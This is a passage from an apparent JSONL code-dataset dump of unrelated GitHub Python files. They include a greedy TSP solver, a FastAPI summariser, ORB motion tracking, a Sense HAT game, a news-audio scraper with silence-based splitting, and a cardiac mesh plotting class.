2))\n\n# Plot the training error curve\nimport matplotlib.pyplot as plt\n\nplt.plot(stop, error, label='Loss')\nplt.xlabel('step')\nplt.ylabel('error')\nplt.legend()\nplt.show()","repo_name":"dobbytk/NLP_study","sub_path":"Multicampus/ML/day8/matrix_factorize_GD.py","file_name":"matrix_factorize_GD.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}\n+{"seq_id":"74344901491","text":"from rest_framework import serializers\nfrom .models import Venue, Event\n\n\nclass EventSerializer(serializers.HyperlinkedModelSerializer):\n venue = serializers.HyperlinkedRelatedField(\n view_name='venue-detail',\n read_only=True\n )\n\n class Meta:\n model = Event\n fields = ('id', 'venue', 'eventname',\n 'datetime', 'price', 'details', 'img')\n\n\nclass VenueSerializer(serializers.HyperlinkedModelSerializer):\n event = EventSerializer(\n many=True,\n read_only=True\n )\n\n class Meta:\n model = Venue\n fields = ('id', 'venuename', 'address', 'city',\n 'state', 'vaccinationrequired', 'event', 'img')\n","repo_name":"BChan26/Tick-iT","sub_path":"Backend/ticket_app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}\n+{"seq_id":"34650721694","text":"import sys\nsys.path.insert(0, '../../TSProject/')\n\nimport numpy as np\nimport random as rd\nfrom time import time \n\n# Implementation of the greedy algorithm for TSP\n# Input:\n# adj_mat: adjacency matrix\n# Output:\n# cost: cost found\n# listOfTraversedNodes: associated path\n# time: time needed to execute the algorithm\n\ndef greedy(graph):\n adj_mat = graph.weighted_adjacency_matrix\n t1 = time()\n nNodes = len(adj_mat)\n firstMove = np.unravel_index(np.argmin(adj_mat),adj_mat.shape)\n listOfTraversedNodes = [firstMove[0],firstMove[1]]\n cost = adj_mat[firstMove[0],firstMove[1]]\n while len(listOfTraversedNodes) < len(adj_mat):\n currentCosts = list(adj_mat[listOfTraversedNodes[-1],:])\n for idx2 in listOfTraversedNodes:\n currentCosts[idx2] = np.inf\n listOfTraversedNodes.append(np.argmin(currentCosts))\n cost += adj_mat[listOfTraversedNodes[-2],listOfTraversedNodes[-1]]\n cost += adj_mat[listOfTraversedNodes[-1],listOfTraversedNodes[0]]\n t2 = time()\n return cost, listOfTraversedNodes + [listOfTraversedNodes[0]], (t2-t1)","repo_name":"FabianWalocha/TSProject","sub_path":"algorithms/greedy.py","file_name":"greedy.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}\n+{"seq_id":"26028273702","text":"#!/usr/bin/python3\n# -*-coding:utf-8 -*-\n# @Time    : 2019/12/4 18:10\n# @Author  : Peter Zheng\n# @File    : dataloader_builder.py\n# @Software: PyCharm\nfrom .csv_dataloader import Csv_Dataloader\n\n_DATA_LOADERS = {\"Csv_Dataloader\":Csv_Dataloader}\ndef make_dataloader(cfg,is_train = True):\n data_loader = _DATA_LOADERS[cfg.DATA_LOADER.TYPE]\n return data_loader(cfg,is_train)","repo_name":"Peter-zds/StrokePrediction","sub_path":"core/dataloader/dataloader_builder.py","file_name":"dataloader_builder.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}\n+{"seq_id":"73256272372","text":"__all__ = [\n \"capture\",\n]\n\nimport logging\nimport subprocess\n\nfrom capsula.config import CapsulaConfig\nfrom capsula.context import Context\n\nlogger = logging.getLogger(__name__)\n\n\ndef 
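# A minimal sketch of driving the greedy() TSP routine above; the Graph class
# here is a hypothetical stand-in for whatever graph container the project
# defines, and the 3-city weight matrix is made up:
import numpy as np

class Graph:
    def __init__(self, w):
        # the routine only reads this one attribute
        self.weighted_adjacency_matrix = np.array(w, dtype=float)

g = Graph([[np.inf, 2, 9],
           [1, np.inf, 6],
           [15, 7, np.inf]])
cost, path, elapsed = greedy(g)
print(cost, path)  # cost == 17.0; path visits [1, 0, 2] and returns to 1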
capture(*, config: CapsulaConfig) -> Context:\n \"\"\"Capture the context.\"\"\"\n logger.debug(f\"Capture config: {config.capture}\")\n\n for command in config.capture.pre_capture_commands:\n logger.info(f\"Running pre-capture command: {command!r}\")\n try:\n result = subprocess.run(\n command,\n shell=True, # noqa: S602\n text=True,\n capture_output=True,\n check=True,\n cwd=config.root_directory,\n )\n except subprocess.CalledProcessError:\n logger.exception(f\"Pre-capture command failed: {command}\")\n raise\n else:\n logger.info(f\"Pre-capture command result: {result}\")\n\n logger.info(\"Capturing the context.\")\n\n config.ensure_capsule_directory_exists()\n\n ctx = Context.capture(config)\n\n # Write the context to the output file.\n with (config.capsule / \"context.json\").open(\"w\") as output_file:\n output_file.write(ctx.model_dump_json(indent=4))\n\n return ctx\n","repo_name":"shunichironomura/capsula","sub_path":"capsula/capture.py","file_name":"capture.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74108316854","text":"from fastapi import FastAPI\nfrom transformers import pipeline\nimport uvicorn\n\nimport nest_asyncio\nnest_asyncio.apply()\n\napp = FastAPI()\n\n# Create a text summarization pipeline using Transformers\nsummarizer = pipeline(\"summarization\")\n\n@app.post(\"/summarize/\")\nasync def summarize_text(input_text: dict):\n \"\"\"\n Summarize a given text.\n :param input_text: {\"text\": \"Your input text here\"}\n :return: {\"summary\": \"Generated summary here\"}\n \"\"\"\n text = input_text[\"text\"]\n summary = summarizer(text, max_length=150, min_length=30, do_sample=False)[0][\"summary_text\"]\n return {\"summary\": summary}\nif __name__=='__main__':\n uvicorn.run(app,host='127.0.0.1',port=5500)","repo_name":"Sanjayredd/Summarizer-api-using-transformers-and-Fastapi","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16341599845","text":"import numpy as np\nfrom CamRunnable import camVideoStream\nimport math as m\nfrom time import sleep\nimport cv2\nimport Plotter\n\nframe_lim = 2000 # Number of independent frames to analyze\ngroup_scale = 100 # How many key points will be tracked\nuse_CLAHE = False # Whether or not normalize for brightness\nbuffer_comparator = [] # Where I will store the information\nbuffer_size = 3 # Number of frames to be considered to attempt a velocity estimation\nanimate = True\npoint_velocities = np.zeros(shape=(group_scale,2)) # Column matrix containing all velocities being monitored at any given time\npoint_distances = np.zeros(shape=(group_scale,2)) # Column matrix containing all velocities being monitored at any given time\norb = cv2.ORB_create() # Oriented FAST and rotated BRIEF characterizer to use within the system # nfeatures = 500,scaleFactor = 1.2,nlevels = 8,edgeThreshold = 31,firstLevel = 0,WTA_K = 2,scoreType = ORB.HARRIS_SCORE,patchSize = 31,fastThreshold = 20\nclahe = cv2.createCLAHE(clipLimit=3.0, tileGridSize=(8,8)) # Setting up the histogram equalizer (these numbers work well for my web camera)\nbf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True) # Matching object being initialized beforehand\nprevious_time = -1\ncurr_frame = 0\ncam_holder = cv2.VideoCapture('C:\\\\Users\\\\David\\\\Desktop\\\\maVideo.mp4')\n#cam_holder = 
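# A minimal sketch of exercising the summarization endpoint above once the
# uvicorn server is running (host/port match the uvicorn.run call; the input
# text is a placeholder):
import requests

resp = requests.post('http://127.0.0.1:5500/summarize/',
                     json={'text': 'Paste a long article here...'})
print(resp.json()['summary'])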
camVideoStream(0,30,640,480)\n#cam_holder.start()\n\nrecord_count = 0\n\ndivision_bin = 50 # To differentiate points\nmax_uniaxial_bins = 10 # This number squared will divide the clusters of data\nthreshold_min = 20\nthreshold_max = division_bin*max_uniaxial_bins+threshold_min\ntime = 0\nif animate: my_plot = Plotter.plotter(200,200,50,50,2,False)\ndef compare_velocities(buffer,point_velocities,point_distances,image):\n velocity_organizer = np.zeros(shape=(2*max_uniaxial_bins+1,2*max_uniaxial_bins+1,2)) # Refresh arrays used in velocity isolation\n position_organizer = np.zeros(shape=(2*max_uniaxial_bins+1,2*max_uniaxial_bins+1,2))\n frequency_organizer = np.zeros(shape=(2*max_uniaxial_bins+1,2*max_uniaxial_bins+1))\n extreme_points = np.zeros(shape=(2*max_uniaxial_bins+1,2*max_uniaxial_bins+1,4))\n captured_base = np.zeros(shape=(2*max_uniaxial_bins+1,2*max_uniaxial_bins+1)) # Check to accumulate the boundaries of the clusters\n\n T = threshold_min # some made up velocity threshold (40 pixels per second)\n \n stream = []\n minVx = []\n maxVx = []\n minVy = []\n maxVy = []\n position = []\n for a_reference1 in buffer:\n for a_reference2 in buffer:\n if a_reference2[2] > a_reference1[2]: # Only compute matches IF the second reference has happened LATER than the first, \n matches = bf.match(a_reference1[1],a_reference2[1]) # giving us an upper triangular analysis of the buffers available: 12, 13, 14, 23, 24, 34 for a buffer of size 4, for example \n dt = a_reference2[2]-a_reference1[2] # we need dt as well\n matches = sorted(matches, key = lambda x:x.distance)\n i = 0\n for a_match in matches:\n img_index = a_match.queryIdx\n reference_index = a_match.trainIdx\n img_loc = a_reference1[0][img_index].pt\n ref_loc = a_reference2[0][reference_index].pt\n locations = [img_loc[0],img_loc[1],ref_loc[0],ref_loc[1]]\n displacements = [ref_loc[0]-img_loc[0],ref_loc[1]-img_loc[1]]\n V_mag = m.sqrt((displacements[0]/dt)**2+(displacements[1]/dt)**2)\n if m.fabs(displacements[0]/dt) < threshold_max and m.fabs(displacements[1]/dt) < threshold_max:\n if animate and V_mag > T: cv2.rectangle(image,(int(ref_loc[0]),int(ref_loc[1])),(int(ref_loc[0])+2,int(ref_loc[1])+2),(255,255,255),2)\n if m.fabs(displacements[0]/dt) > threshold_min:\n point_velocities[i][0] = (displacements[0]/dt)\n else:\n point_velocities[i][0] = 0\n if m.fabs(displacements[1]/dt) > threshold_min:\n point_velocities[i][1] = (displacements[1]/dt)\n else:\n point_velocities[i][1] = 0\n x_bin_pos = int(np.sign(point_velocities[i][0])*m.ceil(m.fabs((point_velocities[i][0]-threshold_min*np.sign(point_velocities[i][0]))/division_bin)))+max_uniaxial_bins\n y_bin_pos = int(np.sign(point_velocities[i][1])*m.ceil(m.fabs((point_velocities[i][1]-threshold_min*np.sign(point_velocities[i][1]))/division_bin)))+max_uniaxial_bins\n if captured_base[x_bin_pos][y_bin_pos] == 0: # Captures extreme points of the cluster (first one is a default) [xmin xmax ymin ymax] per histogram slot\n extreme_points[x_bin_pos][y_bin_pos][0] = int(ref_loc[0])\n extreme_points[x_bin_pos][y_bin_pos][1] = int(ref_loc[0])\n extreme_points[x_bin_pos][y_bin_pos][2] = int(ref_loc[1])\n extreme_points[x_bin_pos][y_bin_pos][3] = int(ref_loc[1])\n captured_base[x_bin_pos][y_bin_pos] = 1\n else:\n if int(ref_loc[0]) > extreme_points[x_bin_pos][y_bin_pos][1]:\n extreme_points[x_bin_pos][y_bin_pos][1] = int(ref_loc[0])\n if int(ref_loc[0]) < extreme_points[x_bin_pos][y_bin_pos][0]:\n extreme_points[x_bin_pos][y_bin_pos][0] = int(ref_loc[0])\n if int(ref_loc[1]) > 
extreme_points[x_bin_pos][y_bin_pos][3]:\n extreme_points[x_bin_pos][y_bin_pos][3] = int(ref_loc[1])\n if int(ref_loc[1]) < extreme_points[x_bin_pos][y_bin_pos][2]:\n extreme_points[x_bin_pos][y_bin_pos][2] = int(ref_loc[1])\n velocity_organizer[x_bin_pos][y_bin_pos][0] += (point_velocities[i][0]) # Here classification magic happens!!\n velocity_organizer[x_bin_pos][y_bin_pos][1] += (point_velocities[i][1]) # Here classification magic happens!!\n position_organizer[x_bin_pos][y_bin_pos][0] += int(ref_loc[0]) # Here classification magic happens!!\n position_organizer[x_bin_pos][y_bin_pos][1] += int(ref_loc[1]) # Here classification magic happens!!\n frequency_organizer[x_bin_pos][y_bin_pos] += 1\n point_distances[i][0] = int(ref_loc[0])\n point_distances[i][1] = int(ref_loc[1])\n i+=1\n if i >= group_scale:\n minVx.append(np.min(point_velocities[:,0]))\n maxVx.append(np.max(point_velocities[:,0]))\n minVy.append(np.min(point_velocities[:,1]))\n maxVy.append(np.max(point_velocities[:,1]))\n break\n stream.append(np.copy(point_velocities))\n position.append(np.copy(point_distances))\n for x in range(len(frequency_organizer)):\n for y in range(len(frequency_organizer[0])):\n if frequency_organizer[x][y] > 0:\n velocity_organizer[x][y][0] = velocity_organizer[x][y][0]/(frequency_organizer[x][y])\n velocity_organizer[x][y][1] = velocity_organizer[x][y][1]/(frequency_organizer[x][y])\n position_organizer[x][y][0] = position_organizer[x][y][0]/(frequency_organizer[x][y])\n position_organizer[x][y][1] = position_organizer[x][y][1]/(frequency_organizer[x][y])\n if frequency_organizer[x][y] > 0 and (x != max_uniaxial_bins and y != max_uniaxial_bins):\n if animate:\n x_pos = int(position_organizer[x][y][0])\n y_pos = int(position_organizer[x][y][1])\n V = m.sqrt((velocity_organizer[x][y][0])**2+(velocity_organizer[x][y][1])**2)\n cv2.rectangle(image,(x_pos,y_pos),(x_pos+2,y_pos+2),(0,0,0),2)\n cv2.rectangle(image,(int(extreme_points[x][y][0]),int(extreme_points[x][y][2])),(int(extreme_points[x][y][1]),int(extreme_points[x][y][3])),(238,130,238),2)\n cv2.arrowedLine(image,(x_pos,y_pos),(x_pos+int(velocity_organizer[x][y][0]/10),y_pos+int(velocity_organizer[x][y][1]/10)),(0,255,0),thickness=1)\n cv2.putText(image,str('%.3f'%V),(x_pos,y_pos), cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,0,255),1,cv2.LINE_AA)\n if animate: my_plot.plot_information(image,stream,[-500,500],[-500,500])\n return stream, position\nwhile curr_frame <= frame_lim:\n grabbed, a_frame = cam_holder.read()\n if grabbed == False:\n break\n a_frame = cv2.resize(a_frame, (640, 480)) \n time += 1/30\n #a_frame, time = cam_holder.read()\n if time != previous_time:\n gray_frame = cv2.cvtColor(a_frame,cv2.COLOR_BGR2GRAY) \n if use_CLAHE:\n gray_cl = clahe.apply(gray_frame)\n kp, des = orb.detectAndCompute(gray_cl,None)\n else:\n kp, des = orb.detectAndCompute(gray_frame,None)\n if kp: # Proceed if detection was successful\n if record_count < buffer_size: # If we have not captured enough frames to compute velocities\n buffer_comparator.append([kp,des,time]) # Save whatever you got in the current frame to be used\n record_count += 1 # Let the program know that you have recorded a frame\n else: # We now got enough frames to always be 'full'\n buffer_comparator = buffer_comparator[1:] # Erase first element from the list and move entire list of objects back\n buffer_comparator.append([kp,des,time]) # Save whatever you got in the current frame to be used in the LAST position\n stream, pos = 
compare_velocities(buffer_comparator,point_velocities,point_distances,a_frame)\n #compute_movement(stream,pos)\n cv2.imshow('original',a_frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n previous_time = time\n curr_frame = curr_frame + 1\n else:\n sleep(0.017)\ncam_holder.stop()\ncv2.destroyAllWindows()\n","repo_name":"HDavidSolano/small-cv-projects","sub_path":"CraftedCVCodes/OldMovementDec.py","file_name":"OldMovementDec.py","file_ext":"py","file_size_in_byte":10390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}\n+{"seq_id":"30020634422","text":"# This code runs a simplified version of Flappy Bird\n# on an emulated 8x8 LED grid\n\n# Usage: \n# Emulator located at: https://trinket.io/sense-hat\n# Copy this code into the window\n# Click 'Stop' then 'Run' at the top\n# Click on the emulated hardware\n# Use arrow keys to dodge red pipes with your green dot\n\n# current bugs:\n# 1. previous game's Astronaut position flashes green on first joystick movement\n# 2. collision detection is very iffy\n\n\n\nfrom sense_hat import SenseHat\nimport time\nfrom random import randint\n\ns = SenseHat() \n\nB = (0, 0, 255) # Background color (blue)\nP = (255, 0, 0) # Pipe color (red)\nA = (0, 255, 0) # Astronaut's color (green)\n\ngameOver = False # used for game loop condition\n\n# creates 8 lists of 8 (blue) background pixels\nmatrix = [[B for col in range(8)] for row in range(8)]\n\n# global vars for initial Astronaut coordinates\nx = 0\ny = 0\n\n\n# Converts matrix from 8 lists of 8 pixels, into an array of 64 pixels\n# (set_pixels requires this format)\ndef flatten(matrix):\n f = []\n for row in matrix:\n for pixel in row:\n f.append(pixel)\n return f\n \n# Creates a solid pipe in the last column (last pixel of every row), then randomly \n# generates a 3 pixel gap in the Pipe\ndef genPipes(matrix):\n for row in matrix:\n row[-1] = P\n gap = randint(0,2)\n matrix[gap][-1], matrix[gap + 1][-1], matrix[gap + 2][-1] = B, B, B\n return matrix\n \n# moves every pixel to the left one, then creates a new blue column on the right\ndef movePipes(matrix):\n for row in matrix:\n for i in range(7):\n row[i] = row[i+1]\n row[-1] = B\n return matrix\n\ndef drawAstronaut(event):\n global x, y, matrix # allows function to change global vars\n s.set_pixel(x,y,B) # erases astronaut's previous location to prevent doubling\n \n # logic for Astronaut movement, with boundary checks\n if event.action == 'pressed': # IMPORTANT: skipping <--THIS line leads to doubled inputs, because \n if event.direction == \"up\" and y > 0: # event.action == 'released' with event.direction == 'up' \n y -= 1 # would also execute <--THIS line of code\n elif event.direction == \"down\" and y < 7:\n y += 1\n elif event.direction == \"left\" and x > 0:\n x -= 1\n elif event.direction == \"right\" and x < 7:\n x += 1\n\n s.set_pixel(x,y,A) # draw Astronaut in new, moved position\n checkCollision(matrix) # check if Astronaut has hit Pipe\n \n \n# if Astronaut is on a Pipe, lose game\ndef checkCollision(matrix): \n global gameOver # allows setting of global var gameOver\n if matrix[y][x] == P:\n gameOver = True\n\n# whenever the joystick is moved, call drawAstronaut\ns.stick.direction_any = drawAstronaut\n\n\n# \"infinite\" game loop\nwhile not gameOver: \n matrix = genPipes(matrix) # create Pipes in matrix\n checkCollision(matrix) # check collisions\n for i in range(4): # this loop breaks every 4 cycles to create new Pipe (above)\n s.set_pixels(flatten(matrix)) # draw 
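# The buffer comparison in compare_velocities above boils down to the standard
# ORB + brute-force matching recipe; a minimal sketch for just two grayscale
# frames (frame1/frame2 are placeholders for consecutive captures):
kp1, des1 = cv2.ORB_create().detectAndCompute(frame1, None)
kp2, des2 = cv2.ORB_create().detectAndCompute(frame2, None)
matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)
pairs = sorted(matcher.match(des1, des2), key=lambda m: m.distance)
# displacement of the best-matched keypoint between the two frames
dx, dy = np.subtract(kp2[pairs[0].trainIdx].pt, kp1[pairs[0].queryIdx].pt)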
game\n s.set_pixel(x,y,A) # draw Astronaut\n matrix = movePipes(matrix) # shift game\n checkCollision(matrix) # check collisions\n if gameOver: \n break\n time.sleep(1) # wait 1 second\n \n# scrolling text when the game ends\ns.show_message('GAME OVER')\n","repo_name":"aboring/portfolio","sub_path":"flap.py","file_name":"flap.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}\n+{"seq_id":"16289198474","text":"from bs4 import BeautifulSoup\nimport os, sys, re\nimport requests\nfrom urllib.request import urlretrieve\nimport time, random\nimport librosa\nimport soundfile as sf\nimport numpy as np\n\ndef listToString(s): \n str1 = \" \"\n return (str1.join(s)) \n\ndef has_cyrillic(text):\n return bool(re.search('[\\u0400-\\u04FF]', text))\n\ndef splitBySilence (audio, maxSilence=1530, silenceDur=.33):\n '''\n Splitting audio by silence\n\n audio - path to the audio\n maxSilence - maximum sample amplitude still treated as silence \n silenceDur - duration of the silence in seconds\n '''\n\n data, sr = librosa.load(audio, sr=16000) # reading file, taking samples and changing sample rate to 16 kHz\n t = librosa.get_duration(y=data,sr=sr) # audio duration in seconds\n time = np.arange(0, t, t/len(data)) # arrange the time axis according to the number of samples\n\n silenceP = [] # list to store the points where silence begins in the audio \n silence = 0 # variable to calculate if it is silence or not\n i = 0\n while i < len(time):\n if np.abs(data[i]*sr) < maxSilence: # if the amplitude of the voice is not bigger than given value\n silence += int((len(time)*.01)/(int(t))) # start accumulating silence time by adding 0.01 second \n if silence >= int((len(time)*silenceDur)/(int(t))): # if it exceeds silenceDur seconds => silence\n silenceP.append(i - silenceDur*len(time)/t) # adding the beginning of the silence\n silence = 0 # after deciding that it is silence, start counting again from zero\n else: \n silence = 0 # if this wasn't silence, start counting from 0 again\n i += int((len(time)*.01)/(int(t))) # checking every 0.01 second\n\n newSilence = [] # list of the real silence points\n for j in range(len(silenceP)): \n if j+1 == len(silenceP): break \n\n if round(silenceP[j+1]-silenceP[j],1) > (silenceDur+0.1)*len(time)/t: # if the gap between neighboring silence points is bigger than the silence min + 0.1 second\n if newSilence: # then it was actually not silence \n if newSilence[len(newSilence)-1] == silenceP[j]: # in case the beginning of the silence equals the end of the previous silence part \n newSilence.remove(silenceP[j])\n newSilence.append(silenceP[j+1])\n else:\n newSilence.append(silenceP[j])\n newSilence.append(silenceP[j+1])\n else:\n newSilence.append(silenceP[j])\n newSilence.append(silenceP[j+1])\n \n dividedData, durations = [], []\n j = 0\n while j < len(newSilence):\n if j+1 != len(newSilence): \n print (int(newSilence[j]),int(newSilence[j+1]))\n durations.append((newSilence[j+1]-newSilence[j])*t/len(time)) # adding to the list of the durations of non-silent parts\n dividedData.append(data [int(newSilence[j]+100):int(newSilence[j+1])]) # completing the list of new sample data\n j+=2\n\n\n return dividedData, durations, sr\n\nif len(sys.argv) != 2:\n print('Usage: download_audio.py {number_of_audios_to_download}')\n quit()\n\nif not os.path.exists('audios'):\n os.makedirs('audios')\n\nif not os.path.exists('splitted'):\n os.makedirs('splitted')\n\nif not 
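# A note on the sampling arithmetic in splitBySilence above: len(time)/t is
# just the sample rate, so int((len(time)*.01)/(int(t))) counts the samples in
# 0.01 s of audio; at the 16 kHz rate forced by librosa.load that is:
samples_per_tick = int(16000 * 0.01)  # 160 samples per 0.01 s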
os.path.exists('texts'):\n os.makedirs('texts')\n\n# Gets list of already checked news\nchecked = []\nif os.path.exists('checked.txt'):\n fp = open('checked.txt','r+')\n line = fp.readline()\n while line:\n checked.append(line)\n line = fp.readline()\n f = lambda x: x.replace(\"\\n\", \"\")\n checked = list(map(f, checked))\nelse:\n fp = open('checked.txt','a')\n\ncount, k, collected = 1, 1, 0\nwhile os.path.exists('./audios/audio_' + str(count) + '.wav'):\n count += 1\t\nwhile os.path.exists('./splitted/splitted_' + str(k) + '.wav'):\n k += 1\n\nnews = str(373557)\n\n\nwhile collected != int(sys.argv[1]):\n\n # Get the next unchecked news item\n while news in checked:\n news = str(int(news)-1)\n checked.append(news)\n fp.write(news+'\\n') \n\n rulingpage = requests.get(\"https://oxu.az/world/\" + news, timeout=5).text\n soup = BeautifulSoup(rulingpage, 'html.parser')\n doctext = soup.find('div', class_='news-inner')\n \n # If the news exists\n if doctext != None:\n text = re.sub(r'[^\\w\\s]','',listToString(doctext.text.split('\\n')[1:]))\n \n # If the news is not in Russian\n if not has_cyrillic(text):\n\n print(\"Found right news:\", news, \". Searching for audio...\",)\n print ('Downloading...')\n\n audio_link = soup.find('audio')\n \n if audio_link != None:\n audio_link = audio_link.get(\"src\")\n urlretrieve(audio_link, './audios/audio_' + str(count) + '.mp3')\n\n audio_duration = librosa.get_duration(filename='./audios/audio_' + str(count) + '.mp3')\n\n # Transform mp3 to wav format\n os.popen('sox ' + './audios/audio_' + str(count) + '.mp3' + ' -e signed-integer -c 1 -b 16 -r 22050 ' + './audios/audio_' + str(count) + '.wav')\n time.sleep(1)\n os.remove('./audios/audio_' + str(count) + '.mp3')\n\n # Downloads text of the audio\n f = open('./texts/audio_text_' + str(count) +'.txt', \"a\")\n f.write(re.sub(r'[^\\w\\s]','',listToString(doctext.text.split('\\n')[1:])))\n\n divided, durations, s = splitBySilence('./audios/audio_' + str(count) + '.wav', maxSilence=250, silenceDur=0.045)\n\n\n for i in range(len(divided)):\n name = './splitted/splitted_' + str(k)+'.wav' # naming audio chunk\n sf.write(name, divided[i],s,subtype='PCM_16') # write the chunk as 16-bit PCM\n k+=1\n\n count += 1\n collected += 1\n\n news = str(int(news)-1)\n","repo_name":"sevilj/tts_data_collection","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":6536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}\n+{"seq_id":"10451772122","text":"# 3273\n\nimport sys\ninput = sys.stdin.readline\n\ndef sol( ):\n # Sorting does not really seem to matter here.\n length = int(input())\n arr = list(map(int,input().strip().split()))\n target = int(input())\n count,left,right = 0,0,length-1\n arr.sort()\n\n while(left number1:\n\t\treturn number1, number2\n\telse:\n\t\treturn number2, number1\n\n# 1) Fill in the blanks so the print statement displays the result\n# of the function call\nsmaller, bigger = order_numbers(100, 99)\nprint(smaller, bigger)\n\ndef lucky_number(name):\n number = len(name) * 9\n message = \"Hello \" + name + \". 
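# The truncated while-loop above appears to be the classic two-pointer scan
# over a sorted array; a self-contained sketch of that idea (not the original
# code, whose remainder is missing here):
def count_pairs(arr, target):
    arr = sorted(arr)
    count, left, right = 0, 0, len(arr) - 1
    while left < right:
        pair_sum = arr[left] + arr[right]
        if pair_sum == target:
            count += 1
            left += 1
            right -= 1
        elif pair_sum < target:
            left += 1   # sum too small: advance the low pointer
        else:
            right -= 1  # sum too large: retreat the high pointer
    return count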
Your lucky number is \" + str(number)\n return message\n\t \nprint(lucky_number(\"Kay\"))\nprint(lucky_number(\"Cameron\"))","repo_name":"code-org-ndarocha/Google_Coursera-IT_Automation","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29546032345","text":"import numpy as np\nfrom .lv_metrics_geometrics_computations import LVGeometricsComputations\n# from project_heart.enums import CONTAINER, STATES, LV_SURFS\nfrom project_heart.utils.spatial_utils import centroid, radius\nfrom project_heart.modules.speckles.speckle import Speckle, SpeckeDeque\nfrom project_heart.utils.enum_utils import add_to_enum\n\nfrom project_heart.utils.extended_classes import ExtendedDict\n\nimport logging\n\nlogger = logging.getLogger('LV3DMetricsPlotter')\n\nfrom collections import deque\n\n\nclass LV3DMetricsPlotter(LVGeometricsComputations):\n def __init__(self, log_level=logging.INFO, *args, **kwargs):\n super(LV3DMetricsPlotter, self).__init__(log_level=log_level, *args, **kwargs)\n self.EPSILON = 1e-10\n self.explainable_metrics = ExtendedDict() # stores methods and approach used for metric computations\n logger.setLevel(log_level)\n \n def _reolve_window_size(self, ws):\n if ws is None:\n ws = (600,400)\n return ws\n\n def _get_metrics_3D_plotter(self, t=0.0, window_size=None, **kwargs):\n window_size = self._reolve_window_size(window_size)\n \n default_kwargs = dict(\n style='points', \n color=\"gray\", \n opacity=0.6,\n window_size=window_size\n )\n default_kwargs.update(kwargs)\n # plotmesh and virtual nodes\n return self.plot(t=t, re=True, **default_kwargs)\n \n def _resolve_plotter(self, plotter, plot_kwargs, t=0.0):\n # resolve plotter\n if plotter is None:\n if plot_kwargs is None:\n plot_kwargs = dict()\n plotter = self._get_metrics_3D_plotter(t=t, **plot_kwargs)\n return plotter\n \n def plot_longitudinal_line(self, \n t=0.0,\n re=False, \n line_kwargs=None,\n points_kwargs=None,\n plot_kwargs=None, \n plotter=None,\n window_size=None,\n **kwargs):\n # resolve plotter and window size\n window_size = self._reolve_window_size(window_size)\n plotter = self._resolve_plotter(plotter, plot_kwargs, t=t)\n # get apex and base at given timestep\n apex = self.states.get(self.STATES.APEX_REF, t=t)\n base = self.states.get(self.STATES.BASE_REF, t=t)\n # create long line for plot\n from project_heart.utils import lines_from_points\n line = lines_from_points((apex, base))\n # set default args for long line and update if user provided\n d_kwargs = dict(color=\"cyan\")\n if line_kwargs is not None:\n d_kwargs.update(kwargs)\n # add line mesh\n plotter.add_mesh(line, **d_kwargs)\n # add points\n d_kwargs = dict(color=\"orange\", point_size=400)\n if points_kwargs is not None:\n d_kwargs.update(points_kwargs)\n plotter.add_points(np.vstack([apex, base]), **d_kwargs)\n \n # if requested, return plotter\n if re:\n return plotter\n # if not requested, show plot\n else:\n plotter.show(window_size=window_size)\n \n # speckle plotter\n \n def plot_speckles(self, \n spk_args, \n t=0, \n show_subset_centers=False,\n show_la_centers=False,\n show_clusters=False,\n show_clusters_centers=False,\n c_centers_kwargs=None,\n show_longitudinal_line=False,\n fix_longitudinal_line=False,\n subsets_cmap=\"tab20\",\n clusters_cmap=\"hot\",\n window_size=None, \n plotter=None,\n plot_kwargs=None, \n re=False,\n **kwargs):\n \n # resolve plotter and window size\n window_size = 
self._reolve_window_size(window_size)\n plotter = self._resolve_plotter(plotter, plot_kwargs, t=t)\n if show_longitudinal_line:\n if fix_longitudinal_line:\n tla = 0.0\n else:\n tla = t\n plotter = self.plot_longitudinal_line(t=tla, plotter=plotter, window_size=window_size, re=True)\n \n # resolve speckles\n spk_deque = self._resolve_spk_args(spk_args) \n \n # get spk data\n spk_pts = self.get_speckles_xyz(spk_deque, t=t) # spk locations\n \n # plot speckles\n if not show_clusters: #plot speckle points with subsets\n bins = spk_deque.binarize()\n plotter.add_points(spk_pts, scalars=bins, cmap=subsets_cmap, point_size=200)\n else:\n klabels = spk_deque.binarize_clusters()\n kl_ids = spk_deque.enumerate_ids()\n bins = np.zeros(len(klabels))\n bins[kl_ids] = klabels + 1\n plotter.add_points(spk_pts, scalars=bins, cmap=clusters_cmap, point_size=250)\n \n # plot additional info\n if show_subset_centers:\n centers = self.get_speckles_centers(spk_deque, t=t)\n plotter.add_points(centers, color=\"orange\", point_size=275)\n if show_clusters_centers:\n if c_centers_kwargs is None:\n c_centers_kwargs = dict()\n centers = self.get_speckles_c_centers(spk_deque, t=t, **c_centers_kwargs)\n plotter.add_points(centers, color=\"red\", point_size=275)\n if show_la_centers:\n centers = self.get_speckles_la_centers(spk_deque, t=t)\n plotter.add_points(centers, color=\"purple\", point_size=300)\n \n # resolve plotter return\n if re:\n return plotter\n else:\n 